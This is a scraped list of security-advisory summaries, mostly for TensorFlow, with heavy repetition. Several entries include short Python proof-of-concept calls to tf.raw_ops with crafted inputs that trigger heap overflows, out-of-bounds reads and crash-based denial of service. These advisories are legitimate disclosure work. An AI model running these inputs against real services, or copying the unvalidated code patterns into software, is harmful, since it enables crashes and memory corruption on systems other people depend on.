Incomplete validation in tf.raw_ops.CTCLoss allows an attacker to trigger an OOB read from heap: import tensorflow as tf inputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32) labels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64) labels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32) sequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32) tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices, labels_values=labels_values, sequence_length=sequence_length, preprocess_collapse_repeated=True, ctc_merge_repeated=False, ignore_longer_outputs_than_inputs=True) An attacker can also trigger a heap buffer overflow: import tensorflow as tf inputs = tf.constant([], shape=[7, 2, …

Incomplete validation in `tf.raw_ops.CTCLoss`

Incomplete validation in tf.raw_ops.CTCLoss allows an attacker to trigger an OOB read from heap: import tensorflow as tf inputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32) labels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64) labels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32) sequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32) tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices, labels_values=labels_values, sequence_length=sequence_length, preprocess_collapse_repeated=True, ctc_merge_repeated=False, ignore_longer_outputs_than_inputs=True) An attacker can also trigger a heap buffer overflow: import tensorflow as tf inputs = tf.constant([], shape=[7, 2, …

Incomplete validation in `tf.raw_ops.CTCLoss`

Incomplete validation in tf.raw_ops.CTCLoss allows an attacker to trigger an OOB read from heap: import tensorflow as tf inputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32) labels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64) labels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32) sequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32) tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices, labels_values=labels_values, sequence_length=sequence_length, preprocess_collapse_repeated=True, ctc_merge_repeated=False, ignore_longer_outputs_than_inputs=True) An attacker can also trigger a heap buffer overflow: import tensorflow as tf inputs = tf.constant([], shape=[7, 2, …

Incomplete validation in `SparseReshape`

Incomplete validation in SparseReshape results in a denial of service based on a CHECK-failure. import tensorflow as tf input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64) input_shape = tf.zeros([11], dtype=tf.int64) new_shape = tf.zeros([1], dtype=tf.int64) tf.raw_ops.SparseReshape(input_indices=input_indices, input_shape=input_shape, new_shape=new_shape)

Incomplete validation in `SparseReshape`

Incomplete validation in SparseReshape results in a denial of service based on a CHECK-failure. import tensorflow as tf input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64) input_shape = tf.zeros([11], dtype=tf.int64) new_shape = tf.zeros([1], dtype=tf.int64) tf.raw_ops.SparseReshape(input_indices=input_indices, input_shape=input_shape, new_shape=new_shape)

Incomplete validation in `SparseReshape`

Incomplete validation in SparseReshape results in a denial of service based on a CHECK-failure. import tensorflow as tf input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64) input_shape = tf.zeros([11], dtype=tf.int64) new_shape = tf.zeros([1], dtype=tf.int64) tf.raw_ops.SparseReshape(input_indices=input_indices, input_shape=input_shape, new_shape=new_shape)

Incomplete validation in `SparseAdd`

Incomplete validation in SparseAdd results in allowing attackers to exploit undefined behavior (dereferencing null pointers) as well as write outside of bounds of heap allocated data: import tensorflow as tf a_indices = tf.zeros([10, 97], dtype=tf.int64) a_values = tf.zeros([10], dtype=tf.int64) a_shape = tf.zeros([0], dtype=tf.int64) b_indices = tf.zeros([0, 0], dtype=tf.int64) b_values = tf.zeros([0], dtype=tf.int64) b_shape = tf.zeros([0], dtype=tf.int64) thresh = 0 tf.raw_ops.SparseAdd(a_indices=a_indices, a_values=a_values, a_shape=a_shape, b_indices=b_indices, b_values=b_values, b_shape=b_shape, thresh=thresh)

Incomplete validation in `SparseAdd`

Incomplete validation in SparseAdd results in allowing attackers to exploit undefined behavior (dereferencing null pointers) as well as write outside of bounds of heap allocated data: import tensorflow as tf a_indices = tf.zeros([10, 97], dtype=tf.int64) a_values = tf.zeros([10], dtype=tf.int64) a_shape = tf.zeros([0], dtype=tf.int64) b_indices = tf.zeros([0, 0], dtype=tf.int64) b_values = tf.zeros([0], dtype=tf.int64) b_shape = tf.zeros([0], dtype=tf.int64) thresh = 0 tf.raw_ops.SparseAdd(a_indices=a_indices, a_values=a_values, a_shape=a_shape, b_indices=b_indices, b_values=b_values, b_shape=b_shape, thresh=thresh)

Incomplete validation in `SparseAdd`

Incomplete validation in SparseAdd results in allowing attackers to exploit undefined behavior (dereferencing null pointers) as well as write outside of bounds of heap allocated data: import tensorflow as tf a_indices = tf.zeros([10, 97], dtype=tf.int64) a_values = tf.zeros([10], dtype=tf.int64) a_shape = tf.zeros([0], dtype=tf.int64) b_indices = tf.zeros([0, 0], dtype=tf.int64) b_values = tf.zeros([0], dtype=tf.int64) b_shape = tf.zeros([0], dtype=tf.int64) thresh = 0 tf.raw_ops.SparseAdd(a_indices=a_indices, a_values=a_values, a_shape=a_shape, b_indices=b_indices, b_values=b_values, b_shape=b_shape, thresh=thresh)

Improper Verification of Cryptographic Signature

Lotus is an Implementation of the Filecoin protocol written in Go. BLS signature validation in lotus uses blst library method VerifyCompressed. This method accepts signatures in 2 forms: "serialized", and "compressed", meaning that BLS signatures can be provided as either of 2 unique byte arrays. Lotus block validation functions perform a uniqueness check on provided blocks. Two blocks are considered distinct if the CIDs of their blockheader do not match. …

Improper Input Validation

Syncthing is a continuous file synchronization program. In Syncthing before version 1.15.0, the relay server strelaysrv can be caused to crash and exit by sending a relay message with a negative length field. Similarly, Syncthing itself can crash for the same reason if given a malformed message from a malicious relay server when attempting to join the relay. Relay joins are essentially random (from a subset of low latency relays) …

Improper Check for Unusual or Exceptional Conditions

TensorFlow is an end-to-end open source platform for machine learning. An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.QuantizeAndDequantizeV4Grad. This is because the implementation does not validate the rank of the input_* tensors. In turn, this results in the tensors being passes as they are to QuantizeAndDequantizePerChannelGradientImpl. However, the vec<T> method, requires the rank to 1 and triggers a CHECK failure otherwise. The fix will be …

Improper Certificate Validation

In SPIRE 0.8.1 through 0.8.4 and before versions 0.9.4, 0.10.2, 0.11.3 and 0.12.1, specially crafted requests to the FetchX509SVID RPC of SPIRE Server’s Legacy Node API can result in the possible issuance of an X.509 certificate with a URI SAN for a SPIFFE ID that the agent is not authorized to distribute. Proper controls are in place to require that the caller presents a valid agent certificate that is already …

Improper Certificate Validation

In SPIRE 0.8.1 through 0.8.4 and before versions 0.9.4, 0.10.2, 0.11.3 and 0.12.1, specially crafted requests to the FetchX509SVID RPC of SPIRE Server’s Legacy Node API can result in the possible issuance of an X.509 certificate with a URI SAN for a SPIFFE ID that the agent is not authorized to distribute. Proper controls are in place to require that the caller presents a valid agent certificate that is already …

Import token permissions checking not enforced

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2021-3127.txt) Problem Description The NATS server provides for Subjects which are namespaced by Account; all Subjects are supposed to be private to an account, with an Export/Import system used to grant cross-account access to some Subjects. Some Exports are public, such that anyone can import the relevant subjects, and some Exports are private, such that the Import requires a token JWT to prove permission. The JWT …

Import of incorrectly embargoed keys could cause early publication

Impact If your installation is using the export-importer service, there is potential impact. If your installation is not importing keys via the export-importer services, your installation is not impacted. In versions 0.19.1 and earlier, the export-importer service assumed that the server it was importing from had properly embargoed keys for at least 2 hours after their expiry time. There are now known instances of servers that did not properly embargo …

Import loops in account imports, nats-server DoS

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-28466.txt) Problem Description An export/import cycle between accounts could crash the nats-server, after consuming CPU and memory. This issue was fixed publicly in https://github.com/nats-io/nats-server/pull/1731 in November 2020. The need to call this out as a security issue was highlighted by snyk.io and we are grateful for their assistance in doing so. Organizations which run a NATS service providing access to accounts run by untrusted third parties …

Helm OCI credentials leaked into Argo CD logs

Impact When Argo CD was connected to a Helm OCI repository with authentication enabled, the credentials used for accessing the remote repository were logged. Anyone with access to the pod logs - either via access with appropriate permissions to the Kubernetes control plane or a third party log management system where the logs from Argo CD were aggregated - could have potentially obtained the credentials to the Helm OCI repository. …

Heap out of bounds write in `RaggedBinCount`

If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[7,8], values= [5, 16, 51, 76, 29, 27, 54, 95],\ size= 59, weights= [0, 0, 0, 0, 0, 0, 0, 0],\ binary_output=False)

Heap out of bounds write in `RaggedBinCount`

If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[7,8], values= [5, 16, 51, 76, 29, 27, 54, 95],\ size= 59, weights= [0, 0, 0, 0, 0, 0, 0, 0],\ binary_output=False)

Heap out of bounds write in `RaggedBinCount`

If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[7,8], values= [5, 16, 51, 76, 29, 27, 54, 95],\ size= 59, weights= [0, 0, 0, 0, 0, 0, 0, 0],\ binary_output=False)

Heap out of bounds read in `RequantizationRange`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([1], shape=[1], dtype=tf.qint32) input_max = tf.constant([], dtype=tf.float32) input_min = tf.constant([], dtype=tf.float32) tf.raw_ops.RequantizationRange(input=input, input_min=input_min, input_max=input_max)

Heap out of bounds read in `RequantizationRange`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([1], shape=[1], dtype=tf.qint32) input_max = tf.constant([], dtype=tf.float32) input_min = tf.constant([], dtype=tf.float32) tf.raw_ops.RequantizationRange(input=input, input_min=input_min, input_max=input_max)

Heap out of bounds read in `RequantizationRange`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([1], shape=[1], dtype=tf.qint32) input_max = tf.constant([], dtype=tf.float32) input_min = tf.constant([], dtype=tf.float32) tf.raw_ops.RequantizationRange(input=input, input_min=input_min, input_max=input_max)

Heap out of bounds read in `MaxPoolGradWithArgmax`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([10.0, 10.0, 10.0], shape=[1, 1, 3, 1], dtype=tf.float32) grad = tf.constant([10.0, 10.0, 10.0, 10.0], shape=[1, 1, 1, 4], dtype=tf.float32) argmax = tf.constant([1], shape=[1], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)

Heap out of bounds read in `MaxPoolGradWithArgmax`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([10.0, 10.0, 10.0], shape=[1, 1, 3, 1], dtype=tf.float32) grad = tf.constant([10.0, 10.0, 10.0, 10.0], shape=[1, 1, 1, 4], dtype=tf.float32) argmax = tf.constant([1], shape=[1], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)

Heap out of bounds read in `MaxPoolGradWithArgmax`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([10.0, 10.0, 10.0], shape=[1, 1, 3, 1], dtype=tf.float32) grad = tf.constant([10.0, 10.0, 10.0, 10.0], shape=[1, 1, 1, 4], dtype=tf.float32) argmax = tf.constant([1], shape=[1], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)

Heap out of bounds in `QuantizedBatchNormWithGlobalNormalization`

An attacker can cause a segfault and denial of service via accessing data outside of bounds in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([1], shape=[1, 1, 1, 1], dtype=tf.quint8) t_min = tf.constant([], shape=[0], dtype=tf.float32) t_max = tf.constant([], shape=[0], dtype=tf.float32) m = tf.constant([1], shape=[1], dtype=tf.quint8) m_min = tf.constant([], shape=[0], dtype=tf.float32) m_max = tf.constant([], shape=[0], dtype=tf.float32) v = tf.constant([1], shape=[1], dtype=tf.quint8) v_min = tf.constant([], shape=[0], dtype=tf.float32) v_max = tf.constant([], shape=[0], dtype=tf.float32) …

Heap out of bounds in `QuantizedBatchNormWithGlobalNormalization`

An attacker can cause a segfault and denial of service via accessing data outside of bounds in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([1], shape=[1, 1, 1, 1], dtype=tf.quint8) t_min = tf.constant([], shape=[0], dtype=tf.float32) t_max = tf.constant([], shape=[0], dtype=tf.float32) m = tf.constant([1], shape=[1], dtype=tf.quint8) m_min = tf.constant([], shape=[0], dtype=tf.float32) m_max = tf.constant([], shape=[0], dtype=tf.float32) v = tf.constant([1], shape=[1], dtype=tf.quint8) v_min = tf.constant([], shape=[0], dtype=tf.float32) v_max = tf.constant([], shape=[0], dtype=tf.float32) …

Heap out of bounds in `QuantizedBatchNormWithGlobalNormalization`

An attacker can cause a segfault and denial of service via accessing data outside of bounds in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([1], shape=[1, 1, 1, 1], dtype=tf.quint8) t_min = tf.constant([], shape=[0], dtype=tf.float32) t_max = tf.constant([], shape=[0], dtype=tf.float32) m = tf.constant([1], shape=[1], dtype=tf.quint8) m_min = tf.constant([], shape=[0], dtype=tf.float32) m_max = tf.constant([], shape=[0], dtype=tf.float32) v = tf.constant([1], shape=[1], dtype=tf.quint8) v_min = tf.constant([], shape=[0], dtype=tf.float32) v_max = tf.constant([], shape=[0], dtype=tf.float32) …

Heap OOB write in TFLite

A specially crafted TFLite model could trigger an OOB write on heap in the TFLite implementation of ArgMin/ArgMax: TfLiteIntArray* output_dims = TfLiteIntArrayCreate(NumDimensions(input) - 1); int j = 0; for (int i = 0; i < NumDimensions(input); ++i) { if (i != axis_value) { output_dims->data[j] = SizeOfDimension(input, i); ++j; } } If axis_value is not a value between 0 and NumDimensions(input), then the condition in the if is never true, so …

Heap OOB write in TFLite

A specially crafted TFLite model could trigger an OOB write on heap in the TFLite implementation of ArgMin/ArgMax: TfLiteIntArray* output_dims = TfLiteIntArrayCreate(NumDimensions(input) - 1); int j = 0; for (int i = 0; i < NumDimensions(input); ++i) { if (i != axis_value) { output_dims->data[j] = SizeOfDimension(input, i); ++j; } } If axis_value is not a value between 0 and NumDimensions(input), then the condition in the if is never true, so …

Heap OOB write in TFLite

A specially crafted TFLite model could trigger an OOB write on heap in the TFLite implementation of ArgMin/ArgMax: TfLiteIntArray* output_dims = TfLiteIntArrayCreate(NumDimensions(input) - 1); int j = 0; for (int i = 0; i < NumDimensions(input); ++i) { if (i != axis_value) { output_dims->data[j] = SizeOfDimension(input, i); ++j; } } If axis_value is not a value between 0 and NumDimensions(input), then the condition in the if is never true, so …

Heap OOB read in TFLite

A specially crafted TFLite model could trigger an OOB read on heap in the TFLite implementation of Split_V: const int input_size = SizeOfDimension(input, axis_value); If axis_value is not a value between 0 and NumDimensions(input), then the SizeOfDimension function will access data outside the bounds of the tensor shape array: inline int SizeOfDimension(const TfLiteTensor* t, int dim) { return t->dims->data[dim]; }

Heap OOB read in TFLite

A specially crafted TFLite model could trigger an OOB read on heap in the TFLite implementation of Split_V: const int input_size = SizeOfDimension(input, axis_value); If axis_value is not a value between 0 and NumDimensions(input), then the SizeOfDimension function will access data outside the bounds of the tensor shape array: inline int SizeOfDimension(const TfLiteTensor* t, int dim) { return t->dims->data[dim]; }

Heap OOB read in TFLite

A specially crafted TFLite model could trigger an OOB read on heap in the TFLite implementation of Split_V: const int input_size = SizeOfDimension(input, axis_value); If axis_value is not a value between 0 and NumDimensions(input), then the SizeOfDimension function will access data outside the bounds of the tensor shape array: inline int SizeOfDimension(const TfLiteTensor* t, int dim) { return t->dims->data[dim]; }

Heap OOB read in `tf.raw_ops.Dequantize`

Due to lack of validation in tf.raw_ops.Dequantize, an attacker can trigger a read from outside of bounds of heap allocated data: import tensorflow as tf input_tensor=tf.constant( [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, …

Heap OOB read in `tf.raw_ops.Dequantize`

Due to lack of validation in tf.raw_ops.Dequantize, an attacker can trigger a read from outside of bounds of heap allocated data: import tensorflow as tf input_tensor=tf.constant( [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, …

Heap OOB read in `tf.raw_ops.Dequantize`

Due to lack of validation in tf.raw_ops.Dequantize, an attacker can trigger a read from outside of bounds of heap allocated data: import tensorflow as tf input_tensor=tf.constant( [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, …

Heap OOB in `QuantizeAndDequantizeV3`

An attacker can read data outside of bounds of heap allocated buffer in tf.raw_ops.QuantizeAndDequantizeV3: import tensorflow as tf tf.raw_ops.QuantizeAndDequantizeV3( input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30], signed_input=False, range_given=False, narrow_range=False, axis=3)

Heap OOB in `QuantizeAndDequantizeV3`

An attacker can read data outside of bounds of heap allocated buffer in tf.raw_ops.QuantizeAndDequantizeV3: import tensorflow as tf tf.raw_ops.QuantizeAndDequantizeV3( input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30], signed_input=False, range_given=False, narrow_range=False, axis=3)

Heap OOB in `QuantizeAndDequantizeV3`

An attacker can read data outside of bounds of heap allocated buffer in tf.raw_ops.QuantizeAndDequantizeV3: import tensorflow as tf tf.raw_ops.QuantizeAndDequantizeV3( input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30], signed_input=False, range_given=False, narrow_range=False, axis=3)

Heap OOB and null pointer dereference in `RaggedTensorToTensor`

Due to lack of validation in tf.raw_ops.RaggedTensorToTensor, an attacker can exploit an undefined behavior if input arguments are empty: import tensorflow as tf shape = tf.constant([-1, -1], shape=[2], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) default_value = tf.constant(404, dtype=tf.int64) row = tf.constant([269, 404, 0, 0, 0, 0, 0], shape=[7], dtype=tf.int64) rows = [row] types = ['ROW_SPLITS'] tf.raw_ops.RaggedTensorToTensor( shape=shape, values=values, default_value=default_value, row_partition_tensors=rows, row_partition_types=types)

Heap OOB and null pointer dereference in `RaggedTensorToTensor`

Due to lack of validation in tf.raw_ops.RaggedTensorToTensor, an attacker can exploit an undefined behavior if input arguments are empty: import tensorflow as tf shape = tf.constant([-1, -1], shape=[2], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) default_value = tf.constant(404, dtype=tf.int64) row = tf.constant([269, 404, 0, 0, 0, 0, 0], shape=[7], dtype=tf.int64) rows = [row] types = ['ROW_SPLITS'] tf.raw_ops.RaggedTensorToTensor( shape=shape, values=values, default_value=default_value, row_partition_tensors=rows, row_partition_types=types)

Heap OOB and null pointer dereference in `RaggedTensorToTensor`

Due to lack of validation in tf.raw_ops.RaggedTensorToTensor, an attacker can exploit an undefined behavior if input arguments are empty: import tensorflow as tf shape = tf.constant([-1, -1], shape=[2], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) default_value = tf.constant(404, dtype=tf.int64) row = tf.constant([269, 404, 0, 0, 0, 0, 0], shape=[7], dtype=tf.int64) rows = [row] types = ['ROW_SPLITS'] tf.raw_ops.RaggedTensorToTensor( shape=shape, values=values, default_value=default_value, row_partition_tensors=rows, row_partition_types=types)

Heap OOB access in unicode ops

An attacker can access data outside of bounds of heap allocated array in tf.raw_ops.UnicodeEncode: import tensorflow as tf input_values = tf.constant([58], shape=[1], dtype=tf.int32) input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32) output_encoding = "UTF-8" tf.raw_ops.UnicodeEncode( input_values=input_values, input_splits=input_splits, output_encoding=output_encoding)

Heap OOB access in unicode ops

An attacker can access data outside of bounds of heap allocated array in tf.raw_ops.UnicodeEncode: import tensorflow as tf input_values = tf.constant([58], shape=[1], dtype=tf.int32) input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32) output_encoding = "UTF-8" tf.raw_ops.UnicodeEncode( input_values=input_values, input_splits=input_splits, output_encoding=output_encoding)

Heap OOB access in unicode ops

An attacker can access data outside of bounds of heap allocated array in tf.raw_ops.UnicodeEncode: import tensorflow as tf input_values = tf.constant([58], shape=[1], dtype=tf.int32) input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32) output_encoding = "UTF-8" tf.raw_ops.UnicodeEncode( input_values=input_values, input_splits=input_splits, output_encoding=output_encoding)

Heap OOB access in `Dilation2DBackpropInput`

An attacker can write outside the bounds of heap allocated arrays by passing invalid arguments to tf.raw_ops.Dilation2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 3], dtype=tf.float32) out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32) tf.raw_ops.Dilation2DBackpropInput( input=input_tensor, filter=filter, out_backprop=out_backprop, strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID')

Heap OOB access in `Dilation2DBackpropInput`

An attacker can write outside the bounds of heap allocated arrays by passing invalid arguments to tf.raw_ops.Dilation2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 3], dtype=tf.float32) out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32) tf.raw_ops.Dilation2DBackpropInput( input=input_tensor, filter=filter, out_backprop=out_backprop, strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID')

Heap OOB access in `Dilation2DBackpropInput`

An attacker can write outside the bounds of heap allocated arrays by passing invalid arguments to tf.raw_ops.Dilation2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 3], dtype=tf.float32) out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32) tf.raw_ops.Dilation2DBackpropInput( input=input_tensor, filter=filter, out_backprop=out_backprop, strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID')

Heap buffer overflow in `StringNGrams`

An attacker can cause a heap buffer overflow by passing crafted inputs to tf.raw_ops.StringNGrams: import tensorflow as tf separator = b'\x02\x00' ngram_widths = [7, 6, 11] left_pad = b'\x7f\x7f\x7f\x7f\x7f' right_pad = b'\x7f\x7f\x25\x5d\x53\x74' pad_width = 50 preserve_short_sequences = True l = ['', '', '', '', '', '', '', '', '', '', ''] data = tf.constant(l, shape=[11], dtype=tf.string) l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …

Heap buffer overflow in `StringNGrams`

An attacker can cause a heap buffer overflow by passing crafted inputs to tf.raw_ops.StringNGrams: import tensorflow as tf separator = b'\x02\x00' ngram_widths = [7, 6, 11] left_pad = b'\x7f\x7f\x7f\x7f\x7f' right_pad = b'\x7f\x7f\x25\x5d\x53\x74' pad_width = 50 preserve_short_sequences = True l = ['', '', '', '', '', '', '', '', '', '', ''] data = tf.constant(l, shape=[11], dtype=tf.string) l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …

Heap buffer overflow in `StringNGrams`

An attacker can cause a heap buffer overflow by passing crafted inputs to tf.raw_ops.StringNGrams: import tensorflow as tf separator = b'\x02\x00' ngram_widths = [7, 6, 11] left_pad = b'\x7f\x7f\x7f\x7f\x7f' right_pad = b'\x7f\x7f\x25\x5d\x53\x74' pad_width = 50 preserve_short_sequences = True l = ['', '', '', '', '', '', '', '', '', '', ''] data = tf.constant(l, shape=[11], dtype=tf.string) l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …

Heap buffer overflow in `SparseTensorToCSRSparseMatrix`

An attacker can trigger a denial of service via a CHECK-fail in converting sparse tensors to CSR Sparse matrices: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([0.0], dtype=np.float32) dense_shape = [0, 0] st = tf.SparseTensor(indices_array, value_array, dense_shape) values_tensor = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape)

Heap buffer overflow in `SparseTensorToCSRSparseMatrix`

An attacker can trigger a denial of service via a CHECK-fail in converting sparse tensors to CSR Sparse matrices: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([0.0], dtype=np.float32) dense_shape = [0, 0] st = tf.SparseTensor(indices_array, value_array, dense_shape) values_tensor = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape)

Heap buffer overflow in `SparseSplit`

An attacker can cause a heap buffer overflow in tf.raw_ops.SparseSplit: import tensorflow as tf shape_dims = tf.constant(0, dtype=tf.int64) indices = tf.ones([1, 1], dtype=tf.int64) values = tf.ones([1], dtype=tf.int64) shape = tf.ones([1], dtype=tf.int64) tf.raw_ops.SparseSplit( split_dim=shape_dims, indices=indices, values=values, shape=shape, num_split=1)

Heap buffer overflow in `SparseSplit`

An attacker can cause a heap buffer overflow in tf.raw_ops.SparseSplit: import tensorflow as tf shape_dims = tf.constant(0, dtype=tf.int64) indices = tf.ones([1, 1], dtype=tf.int64) values = tf.ones([1], dtype=tf.int64) shape = tf.ones([1], dtype=tf.int64) tf.raw_ops.SparseSplit( split_dim=shape_dims, indices=indices, values=values, shape=shape, num_split=1)

Heap buffer overflow in `SparseSplit`

An attacker can cause a heap buffer overflow in tf.raw_ops.SparseSplit: import tensorflow as tf shape_dims = tf.constant(0, dtype=tf.int64) indices = tf.ones([1, 1], dtype=tf.int64) values = tf.ones([1], dtype=tf.int64) shape = tf.ones([1], dtype=tf.int64) tf.raw_ops.SparseSplit( split_dim=shape_dims, indices=indices, values=values, shape=shape, num_split=1)

Heap buffer overflow in `RaggedTensorToTensor`

An attacker can cause a heap buffer overflow in tf.raw_ops.RaggedTensorToTensor: import tensorflow as tf shape = tf.constant([10, 10], shape=[2], dtype=tf.int64) values = tf.constant(0, shape=[1], dtype=tf.int64) default_value = tf.constant(0, dtype=tf.int64) l = [849, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …

Heap buffer overflow in `RaggedTensorToTensor`

An attacker can cause a heap buffer overflow in tf.raw_ops.RaggedTensorToTensor: import tensorflow as tf shape = tf.constant([10, 10], shape=[2], dtype=tf.int64) values = tf.constant(0, shape=[1], dtype=tf.int64) default_value = tf.constant(0, dtype=tf.int64) l = [849, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …

Heap buffer overflow in `RaggedTensorToTensor`

An attacker can cause a heap buffer overflow in tf.raw_ops.RaggedTensorToTensor: import tensorflow as tf shape = tf.constant([10, 10], shape=[2], dtype=tf.int64) values = tf.constant(0, shape=[1], dtype=tf.int64) default_value = tf.constant(0, dtype=tf.int64) l = [849, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …

Heap buffer overflow in `RaggedBinCount`

If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[0], values=[1,1,1,1,1], size=5, weights=[1,2,3,4], binary_output=False)

Heap buffer overflow in `RaggedBinCount`

If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[0], values=[1,1,1,1,1], size=5, weights=[1,2,3,4], binary_output=False)

Heap buffer overflow in `RaggedBinCount`

